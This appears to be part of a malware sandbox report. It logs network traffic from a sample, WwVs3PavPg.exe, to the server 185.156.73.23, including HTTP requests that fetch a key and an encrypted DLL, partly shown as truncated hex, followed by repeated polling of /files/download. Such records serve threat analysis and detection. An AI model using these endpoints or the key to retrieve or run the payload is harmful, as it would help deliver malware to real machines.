Dec 20, 2024 17:33:05.918019056 CET	80	49849	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:05.918258905 CET	49849	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:07.937371969 CET	49849	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:07.937733889 CET	49860	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:08.057688951 CET	80	49860	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:08.057738066 CET	80	49849	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:08.057784081 CET	49860	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:08.057826996 CET	49849	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:08.059966087 CET	49860	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:08.179528952 CET	80	49860	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:09.605865002 CET	80	49860	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:09.605969906 CET	49860	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:11.780884027 CET	49860	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:11.781233072 CET	49869	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:11.900906086 CET	80	49869	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:11.900986910 CET	49869	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:11.901151896 CET	80	49860	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:11.903011084 CET	49869	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:11.903016090 CET	49860	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:12.022882938 CET	80	49869	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:14.352859974 CET	80	49869	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:14.355384111 CET	49869	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:15.902904987 CET	49869	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:16.023034096 CET	80	49869	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:16.024039030 CET	49869	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:17.438832045 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:17.558475018 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:17.558564901 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:17.559334993 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:17.679210901 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.153034925 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.153075933 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.153099060 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.153139114 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.153196096 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.153234005 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.153248072 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.153275967 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.153541088 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.153574944 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.153587103 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.153610945 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.153618097 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.153661013 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.153662920 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.153700113 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.153711081 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.153742075 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.153974056 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.154071093 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.169018984 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.184274912 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.273154020 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.273222923 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.273235083 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.273283958 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.277196884 CET	80	49884	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.277254105 CET	49884	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.304037094 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:19.304584980 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.305006027 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:19.424766064 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:20.986183882 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:20.986252069 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:20.986305952 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:20.986323118 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:20.986340046 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:20.986361980 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:20.986402988 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:20.986406088 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:20.986421108 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:20.986438036 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:20.986462116 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:20.986484051 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:20.986865997 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:20.986892939 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:20.986908913 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:20.986928940 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:20.987062931 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.106020927 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.106090069 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.106110096 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.106162071 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.121371984 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.177791119 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.177830935 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.177885056 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.177886009 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.180325985 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.180372953 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.180385113 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.180421114 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.188893080 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.188926935 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.188942909 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.188971996 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.197201967 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.197261095 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.197285891 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.197326899 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.205581903 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.205630064 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.205632925 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.205671072 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.214020014 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.214065075 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.214108944 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.222444057 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.222495079 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.222549915 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.222549915 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.230849981 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.230892897 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.230914116 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.230935097 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.239243031 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.239330053 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.239337921 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.239545107 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.247652054 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.247708082 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.247710943 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.247750044 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.255366087 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.255410910 CET	80	49889	185.156.73.23	192.168.2.6
Dec 20, 2024 17:33:21.255414009 CET	49889	80	192.168.2.6	185.156.73.23
Dec 20, 2024 17:33:21.255450010 CET	49889	80	192.168.2.6	185.156.73.23

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 20, 2024 17:31:59.323647976 CET	1.1.1.1	192.168.2.6	0xf383	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 17:31:59.323647976 CET	1.1.1.1	192.168.2.6	0xf383	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

185.156.73.23

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49792	185.156.73.23	80	5740	C:\Users\user\Desktop\WwVs3PavPg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 17:32:38.968837023 CET	414	OUT	GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:32:40.347254992 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:32:40 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 17:32:40.461878061 CET	388	OUT	GET /dll/key HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:32:40.932085991 CET	224	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:32:40 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 21 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73 Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
Dec 20, 2024 17:32:40.938939095 CET	393	OUT	GET /dll/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:32:41.499490976 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:32:41 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Length: 97296 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED] Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEPOuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~\|jbK!N7R}T2bsq1L^!\|qD'sLnD@bn%0=bQ1+lQXO\|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
Dec 20, 2024 17:32:41.499562025 CET	1236	IN	Data Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU\|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
Dec 20, 2024 17:32:41.499599934 CET	1236	IN	Data Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd Data Ascii: Dp!lR7+2J^'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: rUz(-dFI?[VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
Dec 20, 2024 17:32:41.499798059 CET	1236	IN	Data Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4 Data Ascii: BGpwCy6$h$xZ\|YQ\|5#n&!w@Duhs:\|BFGc3_^MH_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
Dec 20, 2024 17:32:41.499851942 CET	896	IN	Data Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
Dec 20, 2024 17:32:41.499887943 CET	1236	IN	Data Raw: e6 69 2d 49 51 f3 a4 d5 76 b0 82 cf 74 d1 85 19 f7 42 a9 78 eb 0b e9 01 32 e4 1d 91 61 e4 92 ad 68 8b f1 01 d1 83 62 ef 0e ea 87 d8 a0 66 e2 ec 6d df dc 97 39 57 94 e3 66 5a 2b 20 d1 43 cd 8a 07 04 20 9b 76 db 4c a6 9b 12 b9 0c 46 0b 2e ee 08 fc Data Ascii: i-IQvtBx2ahbfm9WfZ+ C vLF.CXb<SK(R?X.!:YjJD^J[,x)<"kp /uTW56"An*M%b"P{$T#/6UC{XQ;,>=
Dec 20, 2024 17:32:41.499923944 CET	1236	IN	Data Raw: df fc 63 59 94 94 22 2e 6e b1 dd f8 1b 24 0c 47 af 41 b3 94 25 ae 63 05 68 cb 3a 78 6c 3a e6 0d fb 89 7f 8a 63 45 33 22 3e 37 2f cf bc bf dc 07 94 6d 6c 26 9b 2d c4 5a 8b a4 95 2b 63 98 62 c1 cf a5 66 8f c2 9e 15 af 99 71 41 93 5a 45 26 fd cf ad Data Ascii: cY".n$GA%ch:xl:cE3">7/ml&-Z+cbfqAZE&j;{1:w\1`gub%gi&!3h+bn,awiHeKQZXrU)DT"->KTgx;1xY6#'BsZy
Dec 20, 2024 17:32:41.499958992 CET	1236	IN	Data Raw: ab 83 12 71 60 ef ac 34 32 d8 70 30 3b 55 9a 12 0e 9f 26 6c be 1f b1 56 29 68 86 1f 1c a5 97 2c 74 ca 37 9a 6a 55 f9 be e3 48 f7 00 72 6f 42 12 41 ec 23 16 2d cd d2 bf 20 52 76 63 2b 78 75 0d b1 13 ba b8 e6 b9 b1 8c 54 24 79 51 3b b2 29 1b ba 44 Data Ascii: q`42p0;U&lV)h,t7jUHroBA#- Rvc+xuT$yQ;)D<1:XRE^7ipg/]BYZe'0ZiU4Nk+@V,E#LQ$iT{}@zFA8F /7B@57ARN"lU^-
Dec 20, 2024 17:32:41.500560045 CET	1236	IN	Data Raw: 2b ed b6 90 93 b5 cb e9 5b 81 d3 0a ac cd 19 0a b7 db 61 4d 90 7d 85 3c 51 38 f9 08 b0 8a 2c 52 5c 3b a3 28 21 b4 b3 8b 95 1d cf 79 a5 e6 17 de 83 a8 dd 37 7c d0 40 73 1a 93 09 91 ed df 13 89 28 1d 8a d0 67 8b 19 59 81 4b 0b 18 94 db ad 26 01 9f Data Ascii: +[aM}<Q8,R\;(!y7\|@s(gYK&&nB<H3Qh-`uK^TG{cKiF{R_y\|w.y0Pc-:gZdSw^P;$)SL'3{y
Dec 20, 2024 17:32:41.507788897 CET	1236	IN	Data Raw: 54 e5 fd b2 c6 83 f0 18 cc 3c bb a5 89 7b 89 54 98 d8 15 a6 fa 49 a4 67 d0 03 82 eb c7 42 29 b9 76 f8 01 5c 2b 20 0a 5c 1d 33 83 13 83 42 79 3d 7e c9 17 b3 a3 51 aa c8 b6 32 7d 48 b8 ad f1 c2 7d 0a 69 9d c2 d2 7a 9b 73 02 47 89 ff 76 3e 73 48 a6 Data Ascii: T<{TIgB)v\+ \3By=~Q2}H}izsGv>sH4w3*gWM\|E j;zq{1"7:ZSe%%_d6YLVl]Rk&06B>lJk(:OB+8aQ$Mnwka{
Dec 20, 2024 17:32:41.507930994 CET	1236	IN	Data Raw: 5c d2 2a c3 33 ff 78 3e 6f b5 ff a6 6c 71 6d 25 ef c6 14 af 9c 6f 38 91 81 96 1f ad 1d af 35 bc c0 00 0c 9f 24 93 c9 3c e6 d2 fa 28 eb 2b 80 23 82 81 de 2e ac 96 52 f9 19 0f 6b e2 00 36 46 1d c0 9d 55 0b 0f 62 85 f0 77 cb de 0e 5b 62 17 62 91 0d Data Ascii: \3x>olqm%o85$<(+#.Rk6FUbw[bbK[FV%#33<ilf.JiN<T=vroh'ekzw,`3MG]snz1;DBKG4h2)N%5^6x8dW61~
Dec 20, 2024 17:32:42.097110033 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:32:42.613701105 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:32:42 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 17:32:44.637545109 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:32:45.178992033 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:32:44 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 17:32:47.200162888 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:32:48.051527977 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:32:47 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 17:32:50.075073004 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:32:50.602869987 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:32:50 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 17:32:52.622360945 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:32:53.155826092 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:32:52 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 17:32:55.168915033 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:32:55.704657078 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:32:55 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 17:32:57.715581894 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 17:32:58.269696951 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 16:32:57 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49843	185.156.73.23	80	5740	C:\Users\user\Desktop\WwVs3PavPg.exe

Timestamp	Bytes transferred	Direction	Data
